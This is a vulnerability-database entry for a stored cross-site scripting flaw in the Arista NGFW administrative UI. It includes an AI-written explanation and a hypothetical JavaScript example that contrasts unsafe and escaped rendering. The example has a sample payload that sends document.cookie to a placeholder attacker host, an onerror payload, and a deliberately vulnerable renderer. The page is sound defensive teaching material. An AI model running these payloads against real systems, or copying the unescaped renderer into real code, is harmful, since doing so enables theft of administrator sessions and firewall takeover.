CVE-2026-25624
Description
Arista NGFW administrative UI has an XSS vulnerability allowing attackers to inject malicious scripts into administrative profiles.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
An administrative cross-site scripting (XSS) vulnerability exists in the web user interface dashboard layout of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). User-supplied values are stored in administrative profiles without validation and are echoed back into the page without output encoding, so a value containing HTML or script is rendered as markup rather than as text when the profile is displayed. Affected versions are not explicitly detailed in the provided references, but the advisory covers Arista NGFW platforms.
Exploitation
An attacker with administrative privileges logged into the web user interface can exploit this vulnerability. By saving crafted values into the unvalidated profile fields, the attacker stores a script payload that the browser executes whenever another administrator's session renders that profile (a stored, rather than reflected, XSS).
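The pattern described in the Vulnerability and Exploitation sections (a stored profile field concatenated into markup, versus the same field HTML-escaped at the point of output) as an added illustration. This is not Arista's code and says nothing about the actual NGFW implementation: the profile fields, the renderer functions, the attacker hostname and the payloads are all hypothetical and constructed for this example.

```javascript
// Added example (hypothetical, not Arista NGFW code): stored XSS via a profile
// field rendered into dashboard markup, vulnerable form beside the hardened form.

// Escape the five characters that change meaning in HTML text and attribute
// contexts. '&' is replaced first so the entities it introduces are not re-escaped.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: stored profile values are concatenated straight into the
// markup. Whatever one administrator saved is parsed as HTML/script by every
// other administrator's browser that renders the dashboard. Note the two
// contexts: an attribute value (data-user) and element text (h3, p).
function renderProfileCardUnsafe(profile) {
  return '<div class="profile" data-user="' + profile.username + '">' +
         '<h3>' + profile.displayName + '</h3>' +
         '<p>' + profile.description + '</p></div>';
}

// Hardened pattern: every untrusted value is escaped where it enters the HTML
// output, so the same stored payload is displayed as inert text.
function renderProfileCard(profile) {
  return '<div class="profile" data-user="' + escapeHtml(profile.username) + '">' +
         '<h3>' + escapeHtml(profile.displayName) + '</h3>' +
         '<p>' + escapeHtml(profile.description) + '</p></div>';
}

// Smoke check for a test suite: does a rendered fragment still contain a raw
// script tag, an inline event handler, inline SVG or a javascript: URL?
// This is a regression check, not a sanitizer; the fix is escaping, not filtering.
function containsActiveContent(html) {
  return /<script\b|<img\b[^>]*\bon\w+\s*=|<svg\b|javascript:/i.test(html);
}

// Constructed sample: a profile saved by a malicious (or compromised) admin.
// The username breaks out of the attribute, the display name carries an
// event-handler payload. attacker.example is a placeholder host.
const maliciousProfile = {
  username: 'ops"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  displayName: '<img src=x onerror="alert(document.domain)">',
  description: 'Normal looking description',
};

// Constructed benign profile with characters that escaping must not mangle.
const benignProfile = {
  username: 'alice',
  displayName: "Alice O'Brien",
  description: 'Tier 2 & 3 firewall admin',
};

// Render both variants for the malicious profile so the difference is visible.
function demo(profile) {
  return {
    unsafe: renderProfileCardUnsafe(profile),
    escaped: renderProfileCard(profile),
  };
}

console.log(demo(maliciousProfile));
```

The attribute context matters as much as the text context: the `username` payload closes the `data-user` attribute and the enclosing tag before opening `<script>`, which is why the hardened renderer escapes quotes as well as angle brackets. A Content-Security-Policy that disallows inline script would also neutralise both payloads, but it is a second layer, not a substitute for output encoding.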
Impact
Successful exploitation of this cross-site scripting vulnerability allows an attacker to execute arbitrary JavaScript in the context of another administrative user's session. Because the victim is an administrator of the firewall itself, the script can perform any action that administrator's session is permitted to perform in the UI, which covers session hijacking, credential theft, and manipulation of the firewall's administrative interface and configuration.
Mitigation
Arista has released Security Advisory 0133 detailing several vulnerabilities in Arista NGFW. Specific patches or fixed versions for this particular XSS vulnerability are not explicitly mentioned in the provided reference; users are advised to consult the advisory for the latest information and any workarounds. The advisory was initially released on February 3, 2026 [1].
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 3
Patches: 0 (no patches discovered yet)
Vulnerability mechanics
No source-code context for this CVE. The mechanics section is only generated when the actual fix diff can be read; without it, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References: 1
News mentions: 0 (no linked articles in our index yet)